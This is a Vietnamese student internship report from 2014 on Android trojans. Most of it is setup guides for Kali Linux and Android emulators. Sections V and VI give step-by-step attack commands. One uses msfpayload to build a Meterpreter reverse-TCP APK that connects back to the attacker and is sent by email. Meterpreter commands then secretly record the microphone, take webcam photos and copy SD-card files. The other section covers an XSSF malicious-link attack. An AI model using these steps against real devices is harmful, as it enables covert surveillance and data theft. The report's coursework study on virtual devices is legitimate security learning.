Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
Sáng kiến Dạy học theo định hướng STEM một số chủ đề phần “vật sống”, Khoa họ...
 
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
30 ĐỀ PHÁT TRIỂN THEO CẤU TRÚC ĐỀ MINH HỌA BGD NGÀY 22-3-2024 KỲ THI TỐT NGHI...
 

BÁO CÁO THỰC TẬP - GIỮA KỲ

  • 1. BÁO CÁO THỰC TẬP August 16, 2014 Page 1 BÁO CÁO ĐỀ TÀI THỰC TẬP ĐỀ TÀI: NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP, SẮP XẾP DỮ LIỆU NHƯ DANH BẠ, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI. GIÁO VIÊN HƯỚNG DẪN: THẦY VÕ ĐỖ THẮNG SINH VIÊN THỰC HIỆN: PHAN LÝ TRÚC ANH BÁO CÁO GIỮA KÌ (17/08/2014)
  • 2. BÁO CÁO THỰC TẬP August 16, 2014 Page 2 Nội dung: 1. Tên đề tài: Nghiên cứu các trojan, malware cho phép đánh cắp, sắp xếp dữ liệu như danh sách contact, tin nhắn trên điện thoại sử dụng android và gửi ra ngoài. 2. Yêu cầu:  Phần 1: Thực hiện đối với mạng LAN (có kết nối wifi) 1.1 Nghiên cứu hệ điều hành Kali Linux. Cài đặt Kali Linux (hoặc Back Track) 1.2 Nghiên cứu cơ chế tạo mã độc trên Kali Linux nói riêng và Android nói chung. 1.3 Nghiên cứu cách tích hợp mã độc vào các phần mềm và quảng bá qua mạng xã hội. 1.4 Thực hiện khai thác data trong thẻ sd card, camera của smartphone.  Phần 2: Thực hiện trên môi trường Virtual Private Server – VPS (server có internet) 2.1 Cài đặt autosploit trên VPS 2.2 Tạo mã độc trên VPS 2.3 Cho phép xâm nhập vào android1, android2, android3… gửi data từ các android về VPS
  • 3. BÁO CÁO THỰC TẬP August 16, 2014 Page 3 MỤC LỤC
  • 4. BÁO CÁO THỰC TẬP August 16, 2014 Page 4 I – KALI LINUX VÀ CÁCH CÀI ĐẶT MÁY ẢO KALI LINUX TRÊN VMWARE WORKSTATION  Kali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết kế để kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Kali Linux phát triển trên nền tảng hệ điều hành Debian, khả năng tương thích với kiến trúc ARM được cải tiến, nó hỗ trợ mạng không dây tốt hơn, có khả năng tùy biến cao và dễ dàng nâng cấp giữa các phiên bản Kali trong trương lai.  Các bước để tạo một máy áo chạy Kali Linux trên phần mềm VMware workstation. 1. Chuẩn bị: - Máy tính được cài đặt phầm mềm VMware workstation. Ở đây ta sẽ dùng VMware workstation 10.0.0 - Download file ISO hệ điều hành Kali Linux 64 bit phiên bản 1.0.7 trên link www.kali.org/downloads 2. Tiến trình: Bước 1: Khởi động VMware. Vào File > New Virtual Machine… (hoặc Ctrl+N) Bước 2: Chọn Type là Custom (advanced) > Next Bước 3: Yêu cầu file để cài đặt máy ảo, ta sẽ chọn I will install the operating system later > Next
  • 5. BÁO CÁO THỰC TẬP August 16, 2014 Page 5 Bước 4: Chọn hệ thống là Linux, Version là Debian 7 64-bit > Next Bước 5: Chọn vùng lưu máy ảo và đặt tên máy ảo là Debian 7 64 > Next
  • 6. BÁO CÁO THỰC TẬP August 16, 2014 Page 6 Bước 6: Cấu hình bộ xử lý là mặc định > Next Bước 7: Chọn bộ nhớ RAM là 512MB > Next. Lưu ý là phải phù hợp với máy thật)
  • 7. BÁO CÁO THỰC TẬP August 16, 2014 Page 7 Bước 8: Chọn loại Network là Bridged networking > Next Bước 9: Cấp phát ổ đĩa cho máy ảo. Ta cấp phát Maximum là 15GB. Chọn Store virtual disk as a single file > Next
  • 8. BÁO CÁO THỰC TẬP August 16, 2014 Page 8 Bước 10: Ta sẽ trỏ file ISO vào máy ảo vừa tạo. Click chuột phải vào tên máy ảo Debian 7 64 > Settings Trỏ dòng CD/DVD (IDE) > phần Connection > Use ISO image file > Ta dẫn đến file Kali Linux 64 bit.ISO Bước 11: Máy ảo được khởi chạy. Tại Boot menu > Chọn Graphical install
  • 9. BÁO CÁO THỰC TẬP August 16, 2014 Page 9 Bước 12: Ta chọn Language, Location, Keyboard > Continue Bước 13: Sau đó ta phải cấu hình Network > đặt Hostname > đặt Domain name > Continue Bước 14: Tạo Users name và Password > Continue. Bước nay khá quan trọng, root password là mật khẩu để bạn đăng nhập vào máy ảo Debian 7 64
  • 10. BÁO CÁO THỰC TẬP August 16, 2014 Page 10 Bước 15: Cấu hình Clock > Next Bước 16: Phân vùng ổ đĩa > ta để mặc định Guided – use entire disk > Continue Khi xuất hiện yêu cầu Write the changes to disk? > chọn Yes > Continue Đợi Install System
  • 11. BÁO CÁO THỰC TẬP August 16, 2014 Page 11 Bước 17: Cấu hình Package manager > Xuất hiện yêu cầu Use the network mirror? > chọn No > Continue Bước 18: Cài đặt GRUB boot loader > Install the GRUB boot loader to the master boot record? > chọn Yes > Continue Bước 19: Ta đợi tiến trình cài đặt hoàn tất > Finish the Installation > Continue Bước 20: Sau khi hoàn tất, máy ảo Debian 7 64 sẽ tự khởi động. Ta đăng nhập với User là root và Password đã đặt.
  • 12. BÁO CÁO THỰC TẬP August 16, 2014 Page 12 II – NGHIÊN CỨU MALWARE, TROJAN VÀ CƠ CHẾ TẠO MÃ ĐỘC TRÊN ANDROID 1. Khái niệm Malware, Trojan: - Malware - Malicious Sofware có nghĩa là bất kỳ phần mềm máy tính độc hại nào đó được tạo nên với ý định xâm nhập làm hại máy tính, thu thập thông tin, truy cập dữ liệu nhạy cảm… mà người sử dụng không hề hay biết. Malware bao gồm virus, worm, trojan horse, adware, spyware, keyloger, backdoor, rootkit… - Trojan - Trojan Horse gọi là phần mềm gián điệp. Nó là một chương trình phần mềm độc hại mà không cố gắng để tự tái tạo, thay vào đó nó sẽ được cài đặt vào hệ thống của người dùng bằng cách giả vờ là một chương trình phần mềm hợp pháp. - Hiện nay, malware chỉ xâm nhập vào máy tính và đánh cắp thông tin người dùng, nó chưa có cơ chế lây lan. Cách thức hoạt động của malware giống như trojan chứ không như virus phá hủy. - Đơn giản là malware và trojan giúp tin tặc truy cập vào máy người dùng, điều khiển từ xa, thu thập thông tin người dùng… 2. Cơ chế hoạt động của Malware: Lấy một ví dụ cụ thể về 1 Malware rất phổ biến trong thời gian vừa qua đó là Malware DroidDream. Malware này hoạt động qua 2 giai đoạn: - Giai đoạn 1: DroidDream được nhúng vào trong một ứng dụng (số lượng ứng dụng chứa Malware này hiện đã nhiều hơn 50 ứng dụng) và sẽ chiếm được quyền root vào thiết bị của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng đầu tiên.
  • 13. BÁO CÁO THỰC TẬP August 16, 2014 Page 13 - Giai đoạn 2: Tự động cài đặt một ứng dụng thứ 2 với một permission đặc biệt cho phép quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có thể gửi các thông tin nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng dụng khác Một khi DroidDream chiếm được quyền root, Malware này sẽ chờ đợi và âm thầm cài đặt một ứng dụng thứ hai, DownloadProviderManager.apk như một ứng dụng hệ thống. Việc cài đặt ứng dụng hệ thống này nhằm ngăn ngừa người dùng xem hoặc gỡ bỏ cài đặt các ứng dụng mà không được phép. Không giống như giai đoạn đầu, người dùng phải khởi động ứng dụng để bắt đầu việc lây nhiễm, ở giai đoạn thứ 2 ứng dụng tự động làm một số việc như là confirm, checkin….Một điều nữa khiến cho bạn không thể biết chúng hoạt động lúc nào, đó là Malware DroidDream này được lập trình để làm hầu hết các công việc của mình vào khoảng thời gian từ 11h đêm tới 8h sáng ngày hôm sau. Đây là khoảng thời gian mà điện thoại ít có khả năng được sử dụng nhất. Điều này làm cho người dùng khó khăn hơn trong việc phát hiện một hành vi bất thường trên chiếc smartphone của mình. Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện thoại. Vấn đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang bị một theo dõi, vì vậy những mối nguy hiểm từ mã độc trên android đang thực sự đe dọa đến an sự an toàn của người dùng hệ điều hành này. 3. Cơ chế hoạt động của Trojan: - Trojan có nhiều loại nhưng phổ biến là 2 loại: Trojan dùng để điều khiển và Trojan dùng để đánh cắp mật khẩu. - Bước đầu cơ chế hoạt động của cả 2 loại này là giống nhau. Máy tính sẽ bị nhiễm trojan qua tập tin đính kèm của thư điện tử, chương trình trò chơi, chương trình nào đó mà bạn vô tình chạy thử. Nó sẽ tự sao chép vào nơi nào đó trong máy tính. Sau đó nó bắt đầu ghi vào registry của máy các thông số đề nó có thễ tự động khởi chạy khi máy tính khởi động. - Tiếp theo, đối với trojan điều khiển nó sẽ cho phép tin tặc từ xa nắm quyền điều khiển máy tính. Còn đối với trojan đánh cắp mật khẩu, nó lưu mật khẩu của người dùng vào 1 file và tự động gửi mail đến tin tặc khi máy tính kết nối mạng.
  • 14. BÁO CÁO THỰC TẬP August 16, 2014 Page 14 III – MÁY ẢO ANDROID VIRTUAL DEVICE – CÁCH TẠO MÁY ẢO QUA PHẦN MỀM ECLIPSE  Phần mềm Eclipse có chức năng Android Virtual Device cho phép ta tạo máy ảo chạy android (có thể là smartphone, tablet…)  Thông qua các máy ảo này ta có thể nghiên cứu cách tích hợp mã độc vào thiết bị chạy android 1. Các Tools cần thiết để cài đặt: - Phần mềm Eclipse - Bộ Java SE Development Kit - Android Developer Tools - Android SDK - Bộ công cụ Android Debug Bridge ADB - Các ứng dụng cơ bản cho Android 2. Tải và cài đặt JDK – Java SE Development Kit: Bước 1: Tải JDK tại http://www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads- 1880260.html Click chọn “Accept License Agreement” Chọn phiên bản phù hợp với máy tính. Ở đây ta chọn Windows x64
  • 15. BÁO CÁO THỰC TẬP August 16, 2014 Page 15 Bước 2: Sauk hi tải về, ta tiến hành cài đặt như nhiều phần mềm khác qua các lựa chọn Next. Cuối cùng click Close Bước 3: Để kiểm tra lại việc cài đặt JDK. Ta mở cmd.exe Gõ lệnh “java <Enter>”
  • 16. BÁO CÁO THỰC TẬP August 16, 2014 Page 16 3. Tải về Eclipse Android Developer Tools và Android SDK: Lưu ý khi ta tải về bộ này, sẽ gồm cả phần mềm Eclipse Bước 1: Tải về tại link http://developer.android.com/sdk/index.html Click vào I have read and agree… và chọn phiên bản 64-bit Click Download Bước 2: Giải nén file vừa tải về. Chạy SDK Manager.exe Lưu ý là có thể gặp lỗi Fetching https://dl-sll... Failed to fetch… Close thông báo này lại. Xuất hiển cửa sổ Choose Packages to Install. Nếu cửa sổ này rỗng > Cancel Quay về cửa sổ Android SDK and AVD manager > Settings > Tick vào ô Force https://... Nếu không bị lỗi này, thì sẽ xuất hiện cửa sổ Android SDK Manager Ta chọn các Packages muốn cài. Và Install
  • 17. BÁO CÁO THỰC TẬP August 16, 2014 Page 17 Bước 3: Tại cửa sổ Choose Packages to Install > Tick vào Accept License > Install > Chờ hoàn tất
  • 18. BÁO CÁO THỰC TẬP August 16, 2014 Page 18 4. Tích hợp Android SDK vào Eclipse: Sau khi có phần mềm Eclipse và bộ Android SDK, ta cần tích hợp lại để sử dụng Bước 1: Mở eclipse.exe trong thư mục giải nén file Eclipse Android Developer Tools và Android SDK đã tải ở trên D: Softadt-bundle-windows-x86_64-20140702eclipseeclipse.exe Bước 2: Vào Help > Install new software… > Add > Name: gõ tên tool muốn đặt > Location: gõ địa chỉ tải về ADT https://dl.google.com/android/eclipse hoặc https://dl-ssl.google.com/android/eclipse > OK Bước 3: Ở cửa sổ Name > Tick vào Developer Tools Bước 4: Chọn các Next > Next > Accept > Next > Finish – Run in Background Bước 5: Vào Windows > Preferences > Android > Browse > Chỉ đường dẫn thư mục Android SDK đã tải > Apply > OK
  • 19. BÁO CÁO THỰC TẬP August 16, 2014 Page 19 Bước 6: Khởi đông lại Eclipse 5. Tạo máy ảo chạy Android trên phần mềm Eclipse: Android Virtual Device là máy ảo cho developer phát triển ứng dụng. Sau đây là các bước tạo 1 AVD trên Eclipse Bước 1: Mở eclipse.exe > Vào Windows > Android Virtual Device Manager > Bước 2: Thiết đặt các thông số cần thiết: Name: Đặt tên cho thiết bị
  • 20. BÁO CÁO THỰC TẬP August 16, 2014 Page 20 Device: Chọn loại thiết bị bạn muốn tạo Target: Chọn phiên bản hệ điều hành Skin: chọn kích cỡ màn hình bạn muốn, thường thì phải phù hợp với Device đã chọn ở trên SDcard: chọn thẻ nhớ ảo cho AVD. Bước 3: Click OK để tạo máy ảo. Khởi chạy bằng nút Start… > Launch Bước 4: Chờ hoàn tất, ta được máy ảo chạy Android
  • 21. BÁO CÁO THỰC TẬP August 16, 2014 Page 21 IV – MÁY ẢO ANDROID TRÊN PHẦN MỀM GENYMOTION THÔNG QUA VIRTUALBOX  Phần mềm Genymotion và VirtualBox cho phép ta tạo máy ảo chạy android (có thể là smartphone, tablet…).  Thông qua các máy ảo này ta có thể nghiên cứu cách tích hợp mã độc vào thiết bị chạy android. 1. Các Tools cần thiết để cài đặt: - Phần mềm Virtual Box. - Phần mềm Genymotion. - Bộ công cụ phát triển Java SE Development Kit. - Bộ công cụ Android SDK Manager. 2. Tải và cài đặt JDK (Java SE Development Kit) và Android SDK Manager: Phần tải và cài đặt đã được hướng dẫn và thực hiện ở mục III của Báo cáo này. 3. Tải về và cài đặt phần mềm tạo máy ảo VirtualBox: Ta có thể bản VirtualBox phù hợp với máy của bạn. - Bước 1: Ta tải về file cài đặt VirtualBox tại trang: http://www.oracle.com/technetwork/server- storage/virtualbox/downloads/index.html Bước 2: Sau khi tải về, ta tiến hành cài đặt như nhiều phần mềm khác:
  • 22. BÁO CÁO THỰC TẬP August 16, 2014 Page 22 Bước 3: Next > Next > Next > Install > Finish Bước 4: Giao diện phần mềm sau khi cài đặt xong.
  • 23. BÁO CÁO THỰC TẬP August 16, 2014 Page 23 4. Tải về và cài đặt ứng dụng Genymotion: Bước 1: Trước khi bắt đầu, ta cần có 1 tài khoản trên web www.genymotion.com Ta có thể đăng ký miễn phí và tải Genymotion về máy. Bước 2: Bắt đầu cài đặt phần mềm Genymotion. Ta lựa chọn ngôn ngữ cài đặt > OK > Next Bước 3: Chọn thư mục lưu cài đặt. Bước 4: Next > Next > Install > Finish
  • 24. BÁO CÁO THỰC TẬP August 16, 2014 Page 24 Bước 5: Mở Genymotion vừa cài đặt xong. Ta vào thiết đặt 1 số thông số ở mục Settings Bước 6: Nhập Username và Password mà bạn đã đăng ký trên web www.genymotion.com ở thẻ General Bước 7: Ở thẻ ADB > chọn Use custom Android SDK tools > Browser đường dẫn đến thư mục sdk trong thư mục mà ta đã tải Android SDK Manager. Sau đó lưu lại cài đặt. F: Softadt-bundle-windows-x86_64-20140702sdk
  • 25. BÁO CÁO THỰC TẬP August 16, 2014 Page 25 5. Tạo máy ảo chạy Android trên Genymotion kết hợp VirtualBox: Bước 1: Ta mở Genymotion lên để tạo máy ảo. Vào Add Bước 2: Chọn tên thiết bị mà muốn làm máy ảo. Xuất hiện cấu hình máy ảo sắp tạo:
  • 26. BÁO CÁO THỰC TẬP August 16, 2014 Page 26 Bước 3: Next > Đợi máy ảo tự động tải về từ web và Finish quá trình tạo máy ảo. Bước 4: Để khởi động máy ảo vừa tạo ta chọn máy ảo > Play
  • 27. BÁO CÁO THỰC TẬP August 16, 2014 Page 27 Bước 5: Giao diện máy ảo Google Nexus 7 vừa tạo thành công.
  • 28. BÁO CÁO THỰC TẬP August 16, 2014 Page 28 V – TẠO MÃ ĐỘC TRÊN MÁY KALI LINUX VÀ TẤN CÔNG VÀO THIẾT BỊ ANDROID: 1. Các công cụ cần thiết: Để thực hiện tạo mã độc và tấn công vào thiết bị Android ta cần chuẩn bị: - Máy chạy hệ điều hành Linux phiên bản Kali (hoặc Back Track). Ở đây dùng VMware để tạo máy ảo Kali (đã được hướng dẫn cách làm). - Thiết bị chạy Android ảo. Ở đây dùng Genymotion kết hợp VirtualBox để tạo tablet chạy Android 4.3. - Cả 2 thiết bị đều có thể kết nối mạng. - Có tài khoản email để gửi và nhận file trên cả 2 thiết bị. 2. Tiến trình: Bước 1: Khởi động máy tấn công Kali Linux và thiết bị nạn nhân Android. Thiết đặt card mạng cho máy tấn công Kali để đảm bảo kết nối được internet. Vào Edit > Virtual Network Editor… Tại VMnet0 > Chọn Type là Bridged > Chọn card mạng của máy thật ở ô Bridged to.
  • 29. BÁO CÁO THỰC TẬP August 16, 2014 Page 29 Bước 3: Kiểm tra IP của máy tấn công Kali bằng lệnh : “ifconfig” Bước 4: Tạo 1 file chứa mã độc và gửi cho thiết bị Android. Ở đây ta tạo file ứng dụng *.apk và gửi qua email.
  • 30. BÁO CÁO THỰC TẬP August 16, 2014 Page 30 Nhập lệnh: “msfpayload android/meterpreter/reverse_tcp lhost=<địa chỉ IP máy tấn công> lport=<địa chỉ port> R > <địa chỉ lưu lại> / <tên file>” Ví dụ lệnh là: msfpayload android/meterpreter/reverse_tcp lhost=192.168.149.136 lport=8080 R > /root/Desktop/appsX.apk. - Tạo ứng dụng ReverseTCP có trên file là appsX.apk. - Địa chỉ IP máy tấn công là 192.168.149.136. - Địa chỉ Port là 8080 (Lưu ý tránh sử dụng các port thông dụng từ 0 đến 1023). - Lưu file tại Desktop. Bước 5: Khởi động ứng dụng Metasploit trên máy tấn công Kali bằng lệnh: “msfconsole” Bước 6: Sau đó ta set các payload, lhost, lport bằng các lệnh: “set payload android/meterpreter/reverse_tcp” “set lhost 192.168.149.136” “set lport 8080”
  • 31. BÁO CÁO THỰC TẬP August 16, 2014 Page 31 Bước 7: Thực hiện lệnh “exploit” để bắt đầu quá trình tấn công. Bước 8: Tại thiết bị Android, sau khi tải về và cài đặt file appsX.apk, ta được ứng dụng MainActivity. Khởi động lên và nhấp vào ReverseTCP.
  • 32. BÁO CÁO THỰC TẬP August 16, 2014 Page 32 Khi đó trên Kali ta nhận được thông báo có thiết bị truy cập vào làm nạn nhân. Bước 9: Dùng lệnh “help” để liệt kê các lệnh mà ta có thể thực hiện được.
  • 33. BÁO CÁO THỰC TẬP August 16, 2014 Page 33 3. Khai thác thông tin hê thống: Xem thông tin hệ thống bằng lệnh “sysinfo”. 4. Ghi âm lén: Ghi âm lén ở thiết bị nạn nhân Android và lưu về máy tấn công Kali bằng lệnh “record_mic”. File ghi âm được là xLijsRbg.wav lưu tự động ở /root của máy Kali. 5. Khai thác webcam và chụp ảnh lén: Kiểm tra danh sách webcam của thiết bị nạn nhân Android và thực hiện chụp ảnh lén, lưu về máy tấn công Kali bằng lệnh “webcam_list” và “webcam_snap <mã webcam>”.
  • 34. BÁO CÁO THỰC TẬP August 16, 2014 Page 34 File ảnh chụp được là FRumITki.jpeg lưu tự động ở /root của máy Kali . 6. Khai thác file hệ thống của máy nạn nhân: Kiểm tra các file hệ thống đang hoạt động bằng lệnh “ps”.
  • 35. BÁO CÁO THỰC TẬP August 16, 2014 Page 35 7. Khai thác dữ liệu từ SDCARD: Di chuyển vào bộ nhớ SDCARD bằng lệnh “cd /sdcard”. Dùng lệnh “ls” để liệt kê danh sách các thư mục/tập tin có trong SDCARD. Xem các tập tin mà máy nạn nhân đã tải về qua lệnh di chuyển thư muc “cd Download” và lệnh liệt kê “ls”. Đánh cắp và tải về tập tin bất kì bằng lệnh “download <tên tập tin>”. Ở đây dùng lệnh “download appsX.apk”. Tập tin appsX.apk vừa đánh cắp về được lưu tự động trong /root của máy tấn công Kali. 8. Kết thúc tấn công: Dùng lệnh “exit” để thoát khỏi Metasploit và kết thúc quá trình tấn công.
  • 36. BÁO CÁO THỰC TẬP August 16, 2014 Page 36 VI – TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC: 1. Các công cụ cần thiết: Để tấn công vào thiết bị Android thông qua liên kết chứa mã độc ta cũng cần chuẩn bị như tấn công bằng file mã độc ở trên: - Máy chạy hệ điều hành Linux phiên bản Kali (hoặc Back Track). Ở đây dùng VMware để tạo máy ảo Kali (đã được hướng dẫn cách làm). - Thiết bị chạy Android ảo. Ở đây dùng Genymotion kết hợp VirtualBox để tạo tablet chạy Android 4.3. - Cả 2 thiết bị đều có thể kết nối mạng. - Có tài khoản email để gửi và nhận thông tin liên kết trên cả 2 thiết bị. 2. Tiến trình: Bước 1: Khởi động máy tấn công Kali Linux và thiết bị nạn nhân Android. Bước 2: Ở máy Kali > Mở Terminal > thực hiện 3 lệnh sau để cập nhật Framework “msfupdate” “cd /opt/metasploit/apps/pro/msf3” “svn export http://xssf.googlecode.com/svn/trunk/ ./ --force” Bước 3: Khởi động Metasploit bằng lệnh “msfconsole”
  • 37. BÁO CÁO THỰC TẬP August 16, 2014 Page 37 Bước 4: Vào XSSF bằng lệnh “load xssf Port=80 Uri=/xssf/ Public=true Mode=Verbose” Bước 5: Thực hiện lệnh “xssf_urls” Ta nhận được các urls (đường dẫn web http) như của XSSF Server, XSSF test page, XSSF logs page…
  • 38. BÁO CÁO THỰC TẬP August 16, 2014 Page 38 Bước 6: Cho máy nạn nhân truy cập vào đường dẫn XSSF test page: http://192.168.149.136:80/xssf/test.html Ta nhận được thông báo trên máy tấn công Kali: 3. Kiểm tra số lượng nạn nhân đang truy cập vào đường dẫn mã độc: Ta dùng lệnh “xssf_victims” để kiểm tra số lượng nạn nhân truy cập vào đường dẫn mã độc http://192.168.149.136:80/xssf/test.html 4. Xem thông tin về nạn nhân đang truy cập: Dùng lệnh “xssf_information <ID máy nạn nhân>” Ở đây ví dụ là “xssf_information 1”
  • 39. BÁO CÁO THỰC TẬP August 16, 2014 Page 39 5. Khai thác dữ liệu từ máy nạn nhân:  Đầu tiên ta dùng lệnh “search auxiliary/xssf” để kiểm tra các quyền mà ta có thể thao tác lên máy nạn nhân  Gửi Thông báo XSSF đến máy nạn nhân qua lệnh: “use auxiliary/xssf/public/misc/alert” “run”
  • 40. BÁO CÁO THỰC TẬP August 16, 2014 Page 40 Ở máy nạn nhân sẽ nhận được cảnh báo XSSF Thoát ra msf bằng lệnh “Ctrl+C” > “back”  Kiểm tra xem nạn nhân có truy cập vào các trang web thông dụng hay không bằng lệnh: “use auxiliary/xssf/public/misc/visited_pages” “run”  Cài đặt 1 đường dẫn mới và qua đó kiểm tra thông tin máy nạn nhân lần nữa: “use auxiliary/gather/android_htmlfileprovider” “set SRVPORT 87” “set URIPATH /” “run”
  • 41. BÁO CÁO THỰC TẬP August 16, 2014 Page 41 Chờ nạn nhân truy cập vào đường dẫn mới http://192.168.149.136:87/ Ta nhận được thông tin máy nạn nhân: 6. Thoát khỏi XSSF của Metasploit: Để thoát khỏi ta thực hiện các lệnh: “Ctrl + C” > “back” > “exit” > “exit”
  • 42. BÁO CÁO THỰC TẬP August 16, 2014 Page 42 VII – BÁO CÁO TUẦN VÀ VIDEO QUÁ TRÌNH 1. Link báo cáo tuần: http://www.slideshare.net/phanconghien/tuan1 http://www.slideshare.net/phanconghien/tuan2 http://www.slideshare.net/phanconghien/tuan3-4 2. Link video quá trình thực hiện: - Cài đặt Kali Linux trên VMware: http://youtu.be/90e-w3SGJnY - Tạo máy ảo Android Virtual Device trên Eclipse: http://youtu.be/7p9_0ojdmqs - Tạo máy ảo Android trên Genymotion và VirtualBox: http://youtu.be/DkxtthrNb9o - Tạo mã độc trên Kali Linux và tấn công vào máy ảo Android: http://youtu.be/iEawr1JupZ8 - Tạo mã độc trên trang web bằng XSSF: http://youtu.be/1Jw8F_H0Jz4 - Clip Giới thiệu bản thân: http://youtu.be/iRfXCEXI9lo
  • 43. BÁO CÁO THỰC TẬP August 16, 2014 Page 43 VIII – NGUỒN THAM KHẢO http://sinhvienit.net/forum www.kali.org/downloads http://forum.bkav.com.vn http://vi.wikipedia.org/wiki http://developer.android.com/sdk/index.html#download http://www.oracle.com/technetwork/java/javase/downloads http://choimobile.vn/forums/#thao-luan-hdh-android.62 http://www.oracle.com/technetwork/server- storage/virtualbox/downloads/index.html http://www.genymotion.com/ http://www.whitehat.vn/threads/ Giáo trình khóa học System Hacking – Trung tâm đào tạo ATHENA – www.Athena.Edu.Vn